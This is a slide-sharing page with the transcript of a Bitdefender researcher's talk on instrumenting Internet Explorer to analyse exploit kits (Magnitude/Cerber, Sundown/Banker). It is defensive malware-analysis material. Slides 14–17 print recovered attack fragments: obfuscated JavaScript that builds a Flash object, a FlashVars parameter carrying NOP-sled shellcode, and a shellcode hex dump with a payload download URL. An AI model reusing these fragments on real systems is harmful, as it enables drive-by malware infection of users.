Insight into Browser Instrumentation for Exploit Analysis

Slide Note
Embed
Share

Explore the complex world of browser instrumentation and exploit analysis through the lens of Mihai Neagu's research at Bitdefender. Delve into the intricacies of exploit kits, malware delivery services, behavior analysis, and hidden aspects of exploit execution processes.

mili_98
mili_98 Follow

Uploaded on Oct 04, 2024 | 0 Views

Download Presentation

Please find below an Image/Link to download the presentation.

The content on the website is provided AS IS for your information and personal use only. It may not be sold, licensed, or shared on other websites without obtaining consent from the author. Download presentation by click this link. If you encounter any issues during the download, it is possible that the publisher has removed the file from their server.

E N D

Presentation Transcript

  1. Browser Instrumentation for Exploit Analysis Mihai Neagu, Bitdefender

  2. About Mihai Neagu Exploit research @ Bitdefender Past: Cloud-based protocols Data encryption Reverse engineering

  3. Summary Exploit Kits Magnitude/Cerber demo The problem Browser instrumentation Sundown/Banker demo Word of advice

  4. Exploit Kits exploit delivery service

  5. What Im interested in What s the Exploit Kit What s the exploit What s the malware

  6. Exploit Demo Magnitude/Cerber

  7. Behavior analysis traffic inspection HTML Compromised website Flash Selector SWF HTML Gateway Flash Dropper SWF HTML Magnitude EK landing Unknown ? Payload, Cerber EXE

  8. Behavior analysis process activity Download+execute Flash Selector Internet Explorer Download+execute Flash Dropper Internet Explorer Unknown ? Download+execute Cerber Internet Explorer

  9. The problem Flash Dropper has no exploit code Where is the actual exploit? How is Cerber downloaded and executed? We need more in-depth inspection

  10. Somethings hidden Flash Dropper (Stage 1) decrypts Flash Exploit (Stage 2) in memory Calls loadBytes on the decrypted bytes Stage 2 performs the actual exploitation // decrypt ... // execute Stage 2 this.loader.loadBytes(_loc2_); We need the contents of _loc2_, the parameter of loadBytes We need memory inspection

  11. Browser instrumentation

  12. Browser instrumentation Dynamic HTML load document.write() mshtml.dll, CElement::InjectTextOrHTML Dynamic JS load eval() jscript9.dll, Js::GlobalObject::DefaultEvalHelper Dynamic object instantiation, parameters object parameter mshtml.dll, CPropertyBag::AddProp Dynamic Flash load loadBytes() flash.dll, Loader.loadBytes Bonus Dry run block payload execution kernel32.dll, CreateProcess, WriteProcessMemory

  13. Exploit Demo Sundown/Banker

  14. Memory dumps analysis Decrypted JS var SFfbfv = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="21" height="32">'; SFfbfv = SFfbfv + '<param name="movie" value="'+ hkcgdshfkj +'" />'; SFfbfv = SFfbfv + '<param name="play" value="true"/>'; SFfbfv = SFfbfv + '<!--[if !IE]>-->'; SFfbfv = SFfbfv + '<object type="application/x-shockwave-flash" data="'+ hkcgdshfkj +'" allowScriptAccess=always width="11" height="14">';

  15. Memory dumps analysis Flash Loader object instantiation <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="21" height="32"> <param name="movie" value= /489567945678456874356487356743256.swf" /> <param name="play" value="true"/> <param name=FlashVars value="exec=9090909090909090909090909090909090909090909090909090909090909090 909090EB7133C9648B71308B760C8B761C8B5E088B " /> ... </object>

  16. Memory dumps analysis Shellcode 0000000000: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ???????????????? ... 0000000120: D0 7A 2E 74 6D 70 00 21 21 21 21 21 21 21 21 21 Dz.tmp !!!!!!!!! ... 0000000180: 21 21 21 21 21 21 21 FF 70 C7 FD DE C0 AF DA 68 !!!!!!! p y_A_Uh 0000000190: 74 74 70 3A 2F 2F 66 76 34 2E 32 32 35 32 39 31 ttp://fv4.225291 00000001A0: 32 2E 63 6F 6D 2F 7A 2E 70 68 70 3F 69 64 3D 31 2.com/z.php?id=1 00000001B0: 33 33 00 00 00 00 33

  17. Memory dumps analysis Flash Exploit, actual exploitation public dynamic class Data4 extends DeleteRangeTimelineOperation public static var flash78:Placement; Vulnerability identified CVE-2016-4117 (Flash type confusion)

  18. Word of advice Use modern mitigations Use modern mitigations Windows 10 control flow guard Chrome, Edge powerful sandboxing features Also use these Also use these AdBlock block malvertising Backup restore encrypted files

  19. Thanks for watching!

Related


Comparison Between Static and Dynamic Program Instrumentation

Comparison Between Static and Dynamic Program Instrumentation

jadiel
Evolution of Mozilla: From Browser Wars to Open-Source Development

Evolution of Mozilla: From Browser Wars to Open-Source Development

meshilem
Understanding Heap Overflows: An Introduction to Exploit Development

Understanding Heap Overflows: An Introduction to Exploit Development

snyr
Clearing Browser Cache and Cookies: Google Chrome Edition

Clearing Browser Cache and Cookies: Google Chrome Edition

tzvi_64
LLVM Instrumentation Overview

LLVM Instrumentation Overview

maude
Man Instrumentation System

Man Instrumentation System

arne
Advanced Instrumentation and Diagnostics for Superconducting Magnets at CERN

Advanced Instrumentation and Diagnostics for Superconducting Magnets at CERN

arnav
Understanding Instrumentation and Process Control

Understanding Instrumentation and Process Control

zayn
Latest Updates on Instrumentation Frontier Activities - September 2021

Latest Updates on Instrumentation Frontier Activities - September 2021

rbuon
Array Calibration Instrumentation Interfaces and Schedule by Maria Concetta Maccarone at CTA Calibration Meeting

Array Calibration Instrumentation Interfaces and Schedule by Maria Concetta Maccarone at CTA Calibration Meeting

mikyn
Introduction to BED Files: An Overview of Browser Extensible Data Format

Introduction to BED Files: An Overview of Browser Extensible Data Format

jsmye
The Rise of Chrome: A Technical Comparison with Competing Browsers

The Rise of Chrome: A Technical Comparison with Competing Browsers

ona_myc
Understanding How Browser Engines Work

Understanding How Browser Engines Work

euon204
Mastering Internet Research for Managers: Browser Tools and Search Techniques

Mastering Internet Research for Managers: Browser Tools and Search Techniques

ryma_k
Troubleshooting Invalid Login Credential Issue on e-Way Bill Portal

Troubleshooting Invalid Login Credential Issue on e-Way Bill Portal

rain
Exploring Blazor: An Experimental .NET Framework for the Browser

Exploring Blazor: An Experimental .NET Framework for the Browser

aithne
Browser Extensions as Assistive Technology: Enhancing Accessibility

Browser Extensions as Assistive Technology: Enhancing Accessibility

nes_vea
Techniques and Tools for Secure Web Browser Extension Development

Techniques and Tools for Secure Web Browser Extension Development

jac_bu
Browser News and Root Inclusion Process Updates

Browser News and Root Inclusion Process Updates

ruff_ler
University of Waterloo Browser Support Guidelines

University of Waterloo Browser Support Guidelines

beer373
Exploring the Use of Browser Extensions for Assistive Technology

Exploring the Use of Browser Extensions for Assistive Technology

lorrain
Secure Exam Monitoring with LockDown Browser and Respondus Monitor

Secure Exam Monitoring with LockDown Browser and Respondus Monitor

rubi_rai
Understanding Exploit Development Fundamentals

Understanding Exploit Development Fundamentals

sebastion
Understanding Frame Pointer Attacks and Exploit Development with pwntools

Understanding Frame Pointer Attacks and Exploit Development with pwntools

elio_9

More Related Content

Update on Tools Integration, Measurement, and Modeling
Update on Tools Integration, Measurement, and Modeling
Safely Logging Password-Derived Measurements for Web Login Systems
Safely Logging Password-Derived Measurements for Web Login Systems
Comprehensive Ship-Based Ice Measurements and Observations on Sikuliaq for Sea State DRI
Comprehensive Ship-Based Ice Measurements and Observations on Sikuliaq for Sea State DRI
Introduction to Spectroscopic Instrumentation and Monochromators
Introduction to Spectroscopic Instrumentation and Monochromators
Understanding Industrial Instrumentation Transmitters: A Comprehensive Guide
Understanding Industrial Instrumentation Transmitters: A Comprehensive Guide
Automated Software Testing with LLVM Pass and Code Instrumentation
Automated Software Testing with LLVM Pass and Code Instrumentation
Analysis of file:// Vulnerabilities in Android Browser Apps
Analysis of file:// Vulnerabilities in Android Browser Apps
9th International Conference on Control, Instrumentation and Automation (ICCIA2023)
9th International Conference on Control, Instrumentation and Automation (ICCIA2023)
Career Opportunities in Electronics Instrumentation & Control Engineering
Career Opportunities in Electronics Instrumentation & Control Engineering
Understanding Piezo-Electric Transducers in Electronic Instrumentation
Understanding Piezo-Electric Transducers in Electronic Instrumentation
Understanding Fluorimetry: Principles, Applications, and Instrumentation
Understanding Fluorimetry: Principles, Applications, and Instrumentation
Understanding the Difference Between LLVM Profile-Instr-Generate and Profile-Generate Options
Understanding the Difference Between LLVM Profile-Instr-Generate and Profile-Generate Options
Advanced Understanding of Low-Frequency Noise in Instrumentation
Advanced Understanding of Low-Frequency Noise in Instrumentation
Overview of Beam Instrumentation at GSI
Overview of Beam Instrumentation at GSI
Principles of Dental Instrumentation and Patient Positioning
Principles of Dental Instrumentation and Patient Positioning
Understanding PGA Implementation and Common Mode Voltage in Instrumentation Amplifiers
Understanding PGA Implementation and Common Mode Voltage in Instrumentation Amplifiers
Understanding Significant Figures in Electronic Instrumentation
Understanding Significant Figures in Electronic Instrumentation
Meteorological Instrumentation and Observations Overview
Meteorological Instrumentation and Observations Overview
Exploring Secure Cooperative Sharing of Resources in Web Applications
Exploring Secure Cooperative Sharing of Resources in Web Applications
Enhancing Browser Security for Mobile Devices Using Smart CDNs
Enhancing Browser Security for Mobile Devices Using Smart CDNs
Investigating the Privacy Risks of Private Browsing
Investigating the Privacy Risks of Private Browsing
Efficient Online Course Management Guide
Efficient Online Course Management Guide
User Manual for Certificate Courses Login and System Requirements
User Manual for Certificate Courses Login and System Requirements
Comprehensive Overview of Selenium Grid, Leaptest Studio, and Browser Automation
Comprehensive Overview of Selenium Grid, Leaptest Studio, and Browser Automation